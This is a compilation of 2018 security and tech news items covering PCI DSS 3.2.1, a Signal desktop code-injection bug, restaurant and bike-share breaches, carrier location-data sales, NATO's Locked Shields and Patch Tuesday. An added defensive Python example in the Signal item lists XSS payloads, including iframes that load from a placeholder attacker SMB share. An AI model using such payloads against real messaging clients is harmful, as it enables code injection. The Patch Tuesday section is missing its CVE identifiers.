PCI DSS Version 3.2.1 Published by PCI Security Standards Council

The Payment Card Industry Security Standards Council (PCI SSC) published a minor revision to version 3.2 of its Data Security Standard (PCI DSS).

On 17 May, PCI SSC published PCI DSS version 3.2.1. The purpose of the update was to clarify organizations’ use of the Standard and when they would need to upgrade their use of common cryptographic protocols. PCI SSC Chief Technology Officer Troy Leach expanded on the motive for the Standard’s revision in a press release:

This update is designed to eliminate any confusion around effective dates for PCI DSS requirements introduced in v3.2, as well as the migration dates for SSL/early TLS. It is critically important that organizations disable SSL/early TLS and upgrade to a secure alternative to safeguard their payment data.

In version 3.2.1, PCI SSC removed the notes that referred to 1 February 2018 as the effective date for the requirements introduced in v3.2, since that date has now passed. It also updated the affected requirements and Appendix A2 to reflect that, after 30 June 2018, Secure Sockets Layer (SSL) and early Transport Layer Security (TLS) may remain in use only on point-of-sale point-of-interaction (POS POI) terminals, and the service provider connection points they talk to, that can be verified as not susceptible to known exploits of those protocols.

Another important change was the removal of multi-factor authentication (MFA) from the compensating control examples in Appendix B. PCI SSC made this update because all non-console administrative access now requires MFA outright, so MFA can no longer stand in for another control; one-time passwords were added as an alternative example in its place.

The Security Standards Council made a few additional minor updates and included a link to its Document Library so that organizations can review the full summary of changes.

Because version 3.2.1 introduces no new requirements, organizations may continue to assess against PCI DSS version 3.2 through 31 December 2018, after which 3.2.1 becomes the only valid version. Those that stay on 3.2 for the remainder of the year should familiarize themselves with the key challenges of achieving compliance with that version and how to overcome them.


via:  tripwire



Signal Patches Code Injection Bug that Enabled Remote Code Execution

Signal has patched a code injection vulnerability in its desktop client that, under the right conditions, allowed attackers to achieve remote code execution.

The security team for the encrypted communications app, a program which has been available for both Android and iOS since November 2015, published a fix for the bug just hours after first being contacted by a group of security researchers.

Iván Ariel Barrera Oro, Alfredo Ortega and Juliano Rizzo, with assistance from Javier Lorenzo Carlos Smaldone, discovered the vulnerability by accident on 10 May. They were passing XSS payloads back and forth when one of the payloads triggered in Signal's desktop client: the message text was being rendered as HTML rather than as text. Further investigation confirmed that the weakness could be exploited on Linux, Windows and macOS.

Iván Ariel Barrera Oro shared additional details about the vulnerability in a blog post:

We tried different kinds of HTML elements: img, form, script, object, frame, frameset, iframe, sound, video (these last two were funny). They all worked, except that CSP blocked the execution of scripts, which halted in some way this attack. Inside iframes, everything was possible, even loading code from an SMB share! This enables an attacker to execute remote code without caring about CSP. Juliano worked on this with Alfredo, along with trying to get a manageable segmentation fault.


Shortly after announcing the finding on Twitter on 11 May, the researchers reached out to Signal. The messaging app's security team confirmed two hours later that it was working on a patch, and released one about an hour after that.

Barrera Oro was surprised at how quickly Signal shipped the fix, especially given its size, so he looked at the patch file's history. He discovered that Signal had written the same fix earlier but had removed it on 10 April while resolving a linking issue, reintroducing the bug.

The security researcher admitted he still has his doubts about the patch file:

I’m still not convinced about that regex and I’m afraid someone might exploit it, especially those resourceful three-letter agencies….

Signal users should consider updating their software as soon as possible.
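The root cause the researchers describe is untrusted message text being treated as markup; CSP then blocked scripts but, as their quote notes, did nothing about iframes and object loads. The following is an added illustration, not Signal's code or its patch: it models a client that builds a message bubble as an HTML string (the analogue of assigning to innerHTML) and compares raw interpolation, a hypothetical blocklist regex, and contextual escaping. The payloads, the UNC path and the regex are all constructed for the example.

```python
"""Output-encoding comparison for a chat client that renders messages as HTML.

Added example, not Signal's code. The payloads below are constructed; the
host in the UNC path is a placeholder, not a real share.
"""
import html
import re

BUBBLE_OPEN = '<div class="message">'
BUBBLE_CLOSE = "</div>"

# Constructed payloads of the kind the researchers were passing around.
PAYLOADS = [
    '<img src=x onerror="alert(1)">',
    '<iframe src="\\\\attacker.example\\share\\page.html"></iframe>',
    '<IFRAME SRC="\\\\attacker.example\\share\\page.html">',  # upper-case, unclosed
]


def _bubble(body: str) -> str:
    return BUBBLE_OPEN + body + BUBBLE_CLOSE


def render_vulnerable(text: str) -> str:
    """Interpolate the raw message text into markup.

    Any tag inside `text` becomes live DOM once this string hits innerHTML.
    """
    return _bubble(text)


# Hypothetical blocklist (not Signal's regex): strips well-formed <iframe>
# elements and nothing else.
_IFRAME_RE = re.compile(r"<iframe[^>]*>.*?</iframe>", re.S)


def render_blocklist(text: str) -> str:
    """Blocklist 'fix': removes the one element the author thought of.

    Shown only to illustrate why a narrow regex is a poor fix: it knows
    nothing about other tags, letter case or unclosed elements.
    """
    return _bubble(_IFRAME_RE.sub("", text))


def render_escaped(text: str) -> str:
    """Contextual escaping: the text can no longer open a tag or attribute."""
    return _bubble(html.escape(text, quote=True))


_TAG_RE = re.compile(r"<\s*[a-zA-Z]")


def body_opens_tag(rendered: str) -> bool:
    """Crude check used only to compare renderers: does the message body still
    contain something an HTML parser would read as the start of a tag?"""
    body = rendered[len(BUBBLE_OPEN):-len(BUBBLE_CLOSE)]
    return _TAG_RE.search(body) is not None


def compare(payloads=PAYLOADS) -> dict:
    """For each renderer, count payloads that still leave a live tag in the body."""
    renderers = {
        "vulnerable": render_vulnerable,
        "blocklist": render_blocklist,
        "escaped": render_escaped,
    }
    return {name: sum(body_opens_tag(fn(p)) for p in payloads) for name, fn in renderers.items()}


if __name__ == "__main__":
    for name, hits in compare().items():
        print(f"{name:11s} {hits}/{len(PAYLOADS)} payloads still inject markup")
```

The escaping variant neutralizes every payload without relying on CSP at all, which is the property to check for when reviewing a fix of this kind; a blocklist has to anticipate every element, spelling and parser quirk, and the unclosed upper-case iframe above slips straight past the constructed one.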


via:  tripwire


Chili’s Restaurants Suffered Payment Card Data Security Incident

Some Chili’s restaurant locations suffered a data security incident that might have compromised customers’ payment card details.

Brinker International, the Dallas-based hospitality company that operates some 1,600 Chili's restaurants, said it learned of the incident on 11 May. It provided additional details in a press release:

…We believe that malware was used to gather payment card information including credit or debit card numbers as well as cardholder names from our payment-related systems for in-restaurant purchases at certain Chili’s restaurants. Currently, we believe the data incident was limited to between March – April 2018….

The parent company further explained that Chili’s does not store customers’ Social Security Numbers, dates of birth or other pieces of sensitive information.

To address the incident, Brinker said it is working with third-party forensic experts. It hopes their analysis will reveal how the unauthorized access to Chili's payment systems occurred, as well as how many Chili's locations and customers were affected. The company also notified law enforcement and pledged to cooperate with its investigation.

In the meantime, the company said it is arranging identity theft and credit monitoring services for affected Chili's customers, and that it will post any new information it learns to its incident disclosure notice.


Customers who used their payment cards at a Chili’s restaurant between March and April 2018 should consider monitoring their bank and credit card statements closely. If they detect any suspicious transactions, they should notify their financial institution and/or card issuer as soon as possible along with local police and the FTC. They might also consider placing a security freeze or fraud alert on their credit reports.

News of this incident places Chili’s on a growing list of restaurants that have suffered data security incidents affecting customers’ payment cards. Those victims include Applebee’s, Shoney’s and Arby’s.

To help protect themselves against similar events, organizations should look at how they can strengthen the security of their point-of-sale (POS) systems: segmenting the cardholder data environment from the rest of the network, restricting what software can run on POS hosts and monitoring them for unexpected changes, and adopting point-to-point encryption so that card data never sits in clear text on the terminal where memory-scraping malware can read it.


via:  tripwire


US cell carriers are selling access to your real-time phone location data

The company embroiled in a privacy row has “direct connections” to all major US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint — and Canadian cell networks, too.

Four of the largest cell giants in the US are selling your real-time location data to a company that you’ve probably never heard about before.

In case you missed it, a senator last week sent a letter demanding the Federal Communications Commission (FCC) investigate why Securus, a prison technology company, can track any phone “within seconds” by using data obtained from the country’s largest cell giants, including AT&T, Verizon, T-Mobile, and Sprint, through an intermediary, LocationSmart.

The story blew up because a former sheriff snooped on phone location data without a warrant, according to The New York Times. The sheriff has pleaded not guilty to charges of unlawful surveillance.

Yet little is known about how LocationSmart obtained real-time location data on millions of Americans, how the required consent was obtained from the phones' owners, and who else has access to the data.

Kevin Bankston, director of New America’s Open Technology Institute, explained in a phone call that the Electronic Communications Privacy Act only restricts telecom companies from disclosing data to the government. It doesn’t restrict disclosure to other companies, who then may disclose that same data to the government.

He called that loophole “one of the biggest gaps in US privacy law.”

“The issue doesn’t appear to have been directly litigated before, but because of the way that the law only restricts disclosures by these types of companies to government, my fear is that they would argue that they can do a pass-through arrangement like this,” he said.

LocationSmart, a California-based technology company, is one of a handful of so-called data aggregators. It claimed to have “direct connections” to cell carrier networks to obtain real-time cell phone location data from nearby cell towers. It’s less accurate than using GPS, but cell tower data won’t drain a phone battery and doesn’t require a user to install an app. Verizon, one of many cell carriers that sells access to its vast amounts of customer location data, counts LocationSmart as a close partner.

The company boasts coverage of 95 percent of the country, thanks to its access to all the major US carriers, including US Cellular, Virgin, Boost, and MetroPCS, as well as Canadian carriers, like Bell, Rogers, and Telus.

“We utilize the same technology used to enable emergency assistance and this includes cell tower and cell sector location, assisted GPS and cell tower trilateration,” according to a case study on the company’s website.

“With these location sources, we are able to locate virtually any US based mobile devices,” the company claimed.

A person’s precise location can be returned in as little as 15 seconds, according to another case study, and data is usually not cached for longer than two minutes.

Other companies then buy access to LocationSmart’s data — or the data is obtained by a customer of LocationSmart, like 3Cinteractive, which is said to have supplied location data to Securus.

But LocationSmart hasn’t said how it ensures its corporate customers protect the location data to prevent abuse and misuse. A spokesperson for LocationSmart did not return an email with several questions sent prior to publication.

Companies buy into LocationSmart’s location data for many reasons. Sometimes it’s to help locate a nearby store, or to send a marketing text message when a person visits a rival store. Location data can even be used by companies to track deliveries or shipments, or by banks to fight fraud, such as if a person is making card transactions miles apart within just a few minutes of each other.

In any case, the company requires explicit consent from the user before their location data can be used, by sending a one-time text message or allowing a user to hit a button in an app.

LocationSmart also said it allows some customers to obtain “implied” consent, used on a case-by-case basis, when “the nature of the service implies that location will be used.” The company said one example could be when a stranded motorist calls roadside assistance, and the event implies the person is “calling to be found.”

The company even has its own “try-before-you-buy” page that lets you test the accuracy of its data. With a colleague’s consent, we tracked his phone to within a city block of his actual location.

(Screenshot: ZDNet)

The data aggregator said it has access to carrier network location data “because privacy is built into its cloud-based platform.”

While that may be true, the requirement to obtain a person’s consent collapses if a search warrant for that data is issued. That’s exactly how companies like Securus can reveal location data without asking a person’s permission.

According to a Nebraska state government document, an application “can also be configured — with carrier approval and appropriate warrant documentation — to retrieve location data without the user opting-in.” Securus was able to return real-time location data on users without their consent because its system substituted a valid legal order for the user's opt-in.

However, as The New York Times reported, Securus never verified those orders before spitting back results.

We reached out to the four major US carriers prior to publication. We asked how each carrier obtains consent from customers to sell their data and what safeguards they put in place to prevent abuse.

Sprint spokesperson Lisa Belot said the company shares personally identifiable location data “only with customer consent or in response to a lawful request such as a validated court order from law enforcement.”

The company’s privacy policy, which governs customer consent, said third-parties may collect customers’ personal data, “including location information.”

Sprint said the company’s relationship with Securus “does not include data sharing,” and is limited “to supporting efforts to curb unlawful use of contraband cell phones in correctional facilities.”

When asked the same questions, Verizon spokesperson Rich Young provided a boilerplate response regarding Securus and would not comment further.

“We’re still trying to verify their activities, but if this company is, in fact, doing this with our customers’ data, we will take steps to stop it,” he said.

AT&T spokesperson Jim Greer said in a statement: “We have a best practices approach to handling our customers’ data. We are aware of the letter and will provide a response.” Our questions were also not answered.

A spokesperson for T-Mobile did not respond by our deadline.

“It’s important for us to close off that potential loophole and that can easily be done with one line of legislative language,” said Bankston, “which would also have the benefit of making every other company careful about always getting consent before disclosing your data to anyone.”

Ron Wyden, a Democratic senator from Oregon, called on each carrier to stop sharing data with third parties. Wyden argued the sharing “skirts wireless carriers’ legal obligation to be the sole conduit by which the government may conduct surveillance of Americans’ phone records.”

In a blog post, Electronic Frontier Foundation (EFF) said law enforcement may be violating the law by not seeking data directly from the phone carriers. “Law enforcement shouldn’t have unfettered access to this data, whether they get it from Securus or directly from the phone companies,” said the EFF.

Wyden has also called on the FCC to investigate the carriers for allegedly not obtaining user consent.

The FCC has not said yet if it will investigate.


via:  zdnet


NATO Exercise Tests Skills of National Cyber Defenders

More than 1,000 experts from nearly 30 countries have tested their ability to protect IT systems and critical infrastructure networks at NATO’s Locked Shields 2018 live-fire cyber defense exercise.

A total of 22 Blue Teams took part in the exercise, including representatives of NATO, the European Union, the United States, the United Kingdom, Estonia, Finland, Sweden, Latvia, France, the Czech Republic, and South Korea.

Locked Shields, organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) since 2010, took place on April 23-26 in Tallinn, Estonia, and it was won by a 30-member team representing NATO. Teams from France and the Czech Republic finished in second and third place, respectively.

The exercise tested not only the technical abilities of national cyber defense teams when faced with a severe attack, but also their decision-making skills, including cooperation with other teams.

The drill was based on a scenario involving a fictional country named Berylia, which was hit by a series of hostile events and coordinated cyberattacks targeting a civilian Internet service provider and a military airbase. The attacks disrupted the power grid, drones, 4G public safety networks and other critical infrastructure.

Locked Shields involved 4,000 virtualized systems and over 2,500 attacks. Participants were tasked with maintaining complex IT systems while completing a wide range of tasks, including reporting incidents, making strategic decisions, and conducting forensic investigations.

“The exercise serves as a valuable platform for senior decision-makers to practice the coordination required to address complex cyber incidents, both internally and internationally. In the strategic game of Locked Shields Blue Teams had to determine at what level the information should be shared, who has the authority to make a decision and give guidelines, what are the potential legal implications,” said Cdr. Michael Widmann, chief of the NATO CCDCOE Strategy Branch.

“Overall the exercise was a success. Teams coordinated in a complex and dynamic environment and addressed key issues necessary to endure intense cyber attack,” Widmann added.


via:  securityweek


All About Peerlyst, a Thriving Online Platform for Cybersecurity Professionals

Great article from Kim Crawley about a platform I like a lot.



I am very proud to contribute to Tripwire’s The State of Security and to be a regular Peerlyst poster. Peerlyst is a very important online platform for cybersecurity professionals.

It’s my pleasure to speak with Limor Elbaz, Peerlyst’s CEO and founder. She shared with me some excellent insight about what inspired her to start Peerlyst and what makes the platform stand out from the crowd.

Kim Crawley: What inspired you to establish Peerlyst?

Limor Elbaz: My entire career was in security, from the Israeli army through starting Sansa Security, which delivered a crypto engine that is now embedded on every iPhone and Samsung phone, through starting the virus lab at Finjan and creating new products in alliances with companies like McAfee and Trend Micro. In my last gig, I was VP of corp dev at Imperva/Incapsula.

In all these roles, I’ve watched the challenge of security professionals learning, sharing knowledge, consulting with peers and the inherent conflict between security professionals and vendors. Security products are vital for the work of protecting an organization, yet most of the threat education comes from companies making those products or companies paid by them. I wanted to create a place where security professionals (and later, more IT people) will be able to share knowledge, educate and get educated, do a better job, and of course advance their career.

Along the way, we learnt that we can help vendors too by giving them a focused stage for education while keeping the quality high and not harming the users’ experience. We’re also learning that we can help recruiters fill security jobs without spending hours on interviewing irrelevant candidates.

KC: What’s the story of Peerlyst?

LE: We started by building a comprehensive algorithm to detect product names and the security taxonomy (security tags). We launched a prototype at the end of 2014 at Black Hat in Vegas, making a call to users to come and discuss products by writing reviews. Very quickly, dozens of users asked us to blog on Peerlyst’s behalf, and we realized that security professionals want to talk not only about products but also about many security topics.

The format became less rigid, and users started to create blogs and discussions, resources and even tools. In March 2016, we launched a comprehensive new site, using a new stack (Meteor.JS, MongoDB, React.JS). Users now have rich profiles, reputation building, the ability to follow anything (companies, products, people, tags), and sophisticated feeds of content.

Peerlyst now hosts an enormous amount of how-to’s that were co-created by the community, training, panels, meetups around the world and a comprehensive security calendar, all maintained by the community. A typical user would follow topics of interest, people, companies and products, and they would get a very personalized feed of content generated by the community as well as several external news items. Users get invited to posts related to their expertise and interests as well as to relevant jobs.

This makes more than half a million security professionals come to Peerlyst regularly, with a high engagement rate, long sessions and a healthy dynamic of crowdsourcing content. Users on Peerlyst are now creating thousands of security wikis. They even created ebooks that are a collaborative effort of up to a dozen users each, and they are being offered on Peerlyst, as well as Amazon (The Beginner’s Guide to Information Security, Essentials of Cybersecurity, Essentials of Enterprise Network Security, The Complete WarBerryPi and more).

Next, we created Secure Drop, which is a system based on Freedom of the Press where users on Peerlyst can drop information completely anonymously, and we’re one of the first organizations to expose the 200 million breached Equifax records. This initiative evolved into nosecrets.peerlyst.com, where all this breach data is hosted in one database and users can look for records containing their data, and act on it.

KC: How does Peerlyst benefit the cybersecurity community?

LE: We’re addressing a few problems that block security professionals from doing their job and advancing their career:

  1. Inefficient knowledge flow. Vendors and analysts are good at creating educational content because they have research teams, yet not every organization can afford a subscription with an analyst firm.
  2. Formal security education and certifications are quite expensive. Peerlyst offers free peer-based training, as well as an extensive mentoring program.
  3. Security people don’t get to talk to their peers often enough. Physical events, like conferences and round tables, are not enough.

Peerlyst eliminates the barriers of information flow, enabling anyone to learn and advance their career by accessing thousands of crowd-sourced resources, connecting with the top experts without barriers and discovering the latest trends without checking dozens of resources. Peerlyst also gives everyone an opportunity to demonstrate their own expertise in their own way and at their own pace, thus advancing everyone’s reputation and career.

KC: What types of posts are really well received?

LE: The best posts on Peerlyst are resources, which are posts that teach a skill or guide others. For example, how to perform a security task, how to acquire a specific cybersecurity role, or how to get a certification or skill. Peerlyst often creates a placeholder post, and the community builds it out. Check out this for example, a resource that was used over 50,000 times: How To Build And Run A SOC for Incident Response – A Collection Of Resources.

KC: How can companies benefit from partnering with Peerlyst?

LE: We partner with several types of companies:

  1. We syndicate content to external magazines that give our authors the credit and link.
  2. We partner with excellent writers to create awesome content for the community.
  3. Vendors can partner with Peerlyst by becoming members of our vendor community. A vendor membership sponsors the site but also allows the vendor to create a listing for the product and promote content to users in a way that is based on actual interests. (Vendors cannot buy impressions on Peerlyst. Content is distributed based on interest only to make sure that the user experience is intact.)

We welcome more ideas, wishes and feedback. Peerlyst was truly made by the community in most aspects. We are only the facilitators.


via:  tripwire


Verizon stealthily launched a startup offering $40-per-month unlimited data, messaging and minutes

Earlier this year, Verizon quietly launched a new startup called Visible, offering unlimited data, minutes, and messaging services for the low, low price of $40.

To subscribe to the service, users simply download the Visible app (currently available only on iOS) and register. Right now, subscriptions are invitation only, and would-be subscribers need an invitation from a current Visible member.

Once registration is complete, Visible ships a SIM card the next day, and, once it is installed, the user can use Verizon’s 4G LTE network to stream video, send texts and make calls as much as their heart desires.

Visible says there’s no throttling at the end of the month and subscribers can pay using internet-based payment services like PayPal and Venmo (which is owned by PayPal).

The service is only available on unlocked devices — and right now, pretty much only to iPhone users.

“This is something that’s been the seed of an idea for a year or so,” says Minjae Ormes, head of marketing at Visible. “There’s a core group of people from the strategy side. There’s a core group of five or ten people who came up with the idea.”

The company wouldn’t say how much Verizon gave the business to get it off the ground, but the leadership team is composed mostly of former Verizon employees, like Miguel Quiroga, the company’s chief executive.

“The way I would think about it... we are a phone service in the platform that enables everything that you do. The way we launched and the app messaging piece of it. You do everything else on your phone and a lot of time if you ask people your phone is your life,” said Ormes. The thinking was, “let’s give you a phone that you can activate right from your phone and get ready to go and see how it resonates.”

It’s an interesting move from our corporate overlord (Verizon owns Oath, which owns TechCrunch), which is already the top dog in wireless services, with some 150 million subscribers compared with AT&T’s 141.6 million and a soon-to-be-combined Sprint and T-Mobile subscriber base of 126.2 million.

For Verizon, the new company is likely about holding off attrition. The company shed 24,000 postpaid phone connections in the last quarter, according to The Wall Street Journal, which put some pressure on its customer base (but not really all that much).

Mobile telecommunications remain at the core of Verizon’s business plans for the future, even as other carriers like AT&T look to dive deeper into content (while Go90 has been a flop, Verizon hasn’t given up on content plans entirely). The acquisition of Oath added about $1.2 billion in brand revenue (?) to Verizon for the last quarter, but it’s not anywhere near the kind of media juggernaut that AT&T would get through the TimeWarner acquisition.

Verizon seems to be looking to its other mobile services, through connected devices, industrial equipment, autonomous vehicles, and the development of its 5G network for future growth.

Every wireless carrier is pushing hard to develop 5G technologies, which should see nationwide rollout by the end of this year. Verizon recently completed its 11 city trial-run and is banking on expansion of the network’s capabilities to drive new services.

As the Motley Fool noted, all of this comes as Verizon adds new networking capabilities for industrial and commercial applications through its Verizon Connect division, formed in part from Fleetmatics, which Verizon bought for $2.4 billion in 2016, along with Telogis, Sensity Systems and LQD WiFi, to beef up its mobile device connectivity services.

Meanwhile, upstart entrants challenging the big wireless carriers are coming from all quarters. In 2015, Google launched its own wireless service, Project Fi, to compete with traditional carriers, and Business Insider just covered another would-be wireless warrior, Wing.

Founded by the team that created the media site Elite Daily, Wing uses Sprint cell-phone towers to deliver its service.

David Arabov and co-founder Jonathan Francis didn’t take long after taking a $26 million payout for their previous business before getting right back into the startup fray. Unlike Visible, Wing isn’t a one-size-fits-all plan and it’s a much more traditional MVNO. The company has a range of plans starting at $17 for a flip-phone and increasing to an unlimited plan at $27 per month, according to the company’s website.

As carriers continue to face complaints over service fees, locked in contracts, and terrible options, new options are bound to emerge. In this instance, it looks like Verizon is trying to make itself into one of those carriers.


via:  techcrunch


Amazon debuts Prime Book Box, a $23 kids’ book selection, in its first physical Prime book service

Along with the higher price that Amazon is introducing to Prime this month, the company is also bringing another first to its membership service: physical books. The company now has a new product called Prime Book Box, a subscription service for children’s hardback books, selected by Amazon editors, sold as part of its Prime tier. You can register now for an invite for when it starts to ship later this year, starting in the U.S.

Pricing is $22.99 per box, which Amazon says works out to 35 percent below the cumulative list price of the books, and you can subscribe to receive a box every one, two or three months. Books are divided into four age groups (baby to two years, three to five, six to eight and nine to 12), with sample titles including If Animals Kissed Good Night, A Sick Day for Amos McGee, The Willoughbys, and Arlo Finch in the Valley of Fire.

All books are hardcover, and you can opt either for four board books for kids aged two and younger, or two picture books or novels for older children.

“These books include classics that have stood the test of time as well as hidden gems that our Editors couldn’t put down—stories that your reader can enjoy again and again. We will also use your recent purchase history to avoid including a book you have already purchased on Amazon.com,” Amazon notes in its FAQ about the service.



Prime already has a reading service called Prime Reading, but it is focused around Kindle e-books, along with selected digital magazines and travel guides.

The idea of bringing out a physical book service specifically for children is notable. Parents are more likely to buy (and get gifted) physical picture books and young adult novels rather than e-books as presents, and so kids often build up libraries of these. It also could be a helpful fillip to those of us out there who are trying to figure out engaging ways of reducing screen time for offspring.

“We want to help Prime members discover great children’s books that will inspire a love of reading,” a spokesperson told TechCrunch.

It’s also a clever way of introducing younger people to Amazon, and of letting Amazon start developing reading profiles for others in your household besides you, the account holder.

This is not an insignificant data play in that regard: today, Amazon can only make approximations about which books and products are for whom in a household, and even then can only vaguely guess who else lives at your address and orders using your account. This is a way for the company to start building more specific profiles, and doubtless it already has extensive algorithms to suggest what other kinds of products a reader of, say, Madeleine L’Engle might also like to be recommended.

For now, though, the more immediate impression I have here also is that Amazon is not quite giving up on physical books just yet.

Some details that you might not see on the landing page but are notable for how this will work: customers will be able to review each box before it ships and tailor it by swapping books from a curated list, which is one way of avoiding duplicates of books you might already have.

Although books are a very common gift for children, currently you won’t be able to gift Prime Book Box subscriptions, “but we’re always innovating on behalf of customers,” the spokesperson said, so this could be something the company plans to explore down the line.


via:  techcrunch


Danish Capital Area Bikes System Goes Down due to Hacking Attack

The computer system for the Danish capital area city bikes program went offline as a result of a malicious hacking attack.

On 5 May, the administrators of Bycyklen posted a statement informing the public of a hack that occurred sometime over the previous evening:

Everything was erased and our entire system went down as a result of the malicious action. Since the hacking, we have been working hard to solve the problem, but unfortunately, it’s not something we can fix with a snap of the fingers.

According to the program’s “How to” page, Bycyklen enables residents living in Copenhagen, Frederiksberg and surrounding areas to create an account online or on the Android tablet of one of the program’s 1,860 bikes. They can then authenticate themselves at a station with their username and PIN to rent a bike for an hourly fee. Once they’ve finished using the bike, members of the public must return it to an approved Bycyklen station.

Bycyklen issued two updates regarding the hacking attack on its Facebook page the following day. The first revealed that officials needed to go to the docking stations, manually update each affected bike and then charge them up before members could ride them again. The second urged users to report bikes not located in a docking station in exchange for one hour of free riding time.

After having the weekend to investigate the incident, Bycyklen confirmed in an update posted to its website that the hacking attack had not affected users’ data. Administrators of the program clarified this point by sharing how Bycyklen doesn’t store payment information and records only users’ email addresses, phone numbers and PIN codes protected using “salted password hashing,” a technique that helps keep passwords secure.
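To show what “salted password hashing” means in practice for a PIN store like the one described above, here is an added example (not Bycyklen’s code): each user gets a fresh random salt, the PIN is run through a deliberately slow key-derivation function, and verification compares digests in constant time. The storage format, PBKDF2 parameters and sample PINs are assumptions chosen for illustration.

```python
import hashlib
import hmac
import os
from typing import Optional

# Assumed parameters for this example, not values from the article.
HASH_NAME = "sha256"
PBKDF2_ITERATIONS = 600_000   # makes every guess against a stolen record expensive
SALT_BYTES = 16               # 128-bit random salt, unique per user


def hash_pin(pin: str, salt: Optional[bytes] = None) -> str:
    """Return a self-describing record 'pbkdf2_sha256$iterations$salt_hex$digest_hex'."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)   # never reuse a salt across users
    digest = hashlib.pbkdf2_hmac(
        HASH_NAME, pin.encode("utf-8"), salt, PBKDF2_ITERATIONS
    )
    return f"pbkdf2_{HASH_NAME}${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_pin(pin: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and iteration count, then
    compare in constant time so timing does not leak how many bytes matched."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False                    # malformed record: refuse, never crash
    if algo != f"pbkdf2_{HASH_NAME}":
        return False                    # unknown or legacy scheme is not accepted
    digest = hashlib.pbkdf2_hmac(
        HASH_NAME, pin.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def same_pin_different_records(pin: str) -> bool:
    """Salting means two users who choose the same PIN still get unrelated
    stored records, so one cracked record reveals nothing about the other."""
    a, b = hash_pin(pin), hash_pin(pin)
    return a != b and verify_pin(pin, a) and verify_pin(pin, b)


if __name__ == "__main__":
    record = hash_pin("2468")           # constructed sample PIN
    print(record)
    print(verify_pin("2468", record), verify_pin("2469", record))
```

A numeric PIN has a tiny keyspace, so the salt and slow KDF raise the cost of each guess against a stolen record but cannot make it uncrackable, which is why the advice to change PINs after the breach still stands.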

Even so, Bycyklen is urging all users to update their PINs as soon as possible just to be safe.

All bikes operating under Bycyklen were back up and running on 9 May, according to a third announcement made on Facebook.


via:  tripwire


VERT Threat Alert: May 2018 Patch Tuesday Analysis

Today’s VERT Alert addresses Microsoft’s May 2018 Security Updates. VERT is actively working on coverage for these vulnerabilities and expects to ship ASPL-777 on Wednesday, May 9th.

In-The-Wild & Disclosed CVEs


This privilege escalation vulnerability affecting Win32k could allow an attacker to execute code in kernel mode. According to Microsoft, the newest OS releases aren’t affected, but this is being actively exploited on Windows 7, Windows Server 2008 and Windows Server 2008 R2.

Microsoft has rated this as a 4 on the Exploitability Index (Not affected).

Note: Microsoft has rated this as a 0 (Exploitation Detected) on older software releases.


A vulnerability in VBScript could allow attackers to execute code in the context of the logged-in user. This vulnerability could be exploited via certain web browsers or Microsoft Office documents, and Microsoft has reported active exploitation of it.

Microsoft has rated this as a 0 on the Exploitability Index (Exploitation Detected).


A privilege escalation vulnerability affecting Windows 10 versions 1703 and 1709 as well as Windows Server, version 1709 has been publicly disclosed. A malicious application could take advantage of a flaw in the way the Windows kernel image handles objects in memory in order to execute code with higher privileges.

Microsoft has rated this as a 1 on the Exploitability Index (Exploitation More Likely).


According to Microsoft, this vulnerability only impacts Windows 10 Version 1709 and Windows Server version 1709. It could lead to information disclosure. While this vulnerability alone will not allow for system compromise, it could provide useful information that would further enable compromise.

Microsoft has rated this as a 4 on the Exploitability Index (Not affected).

Note: Microsoft has rated this as a 2 (Exploitation Less Likely) on older software releases.

CVE Breakdown by Tag

While historical Microsoft Security Bulletin groupings are gone, Microsoft vulnerabilities are tagged with an identifier. This list provides a breakdown of the CVEs on a per-tag basis.


Other Information

In addition to the Microsoft vulnerabilities included in the May Security Guidance, a security advisory was also made available.


Microsoft released updates for Adobe Flash. These correspond with Adobe Update APSB18-16. This includes a fix for CVE-2018-4944.



via: tripwire
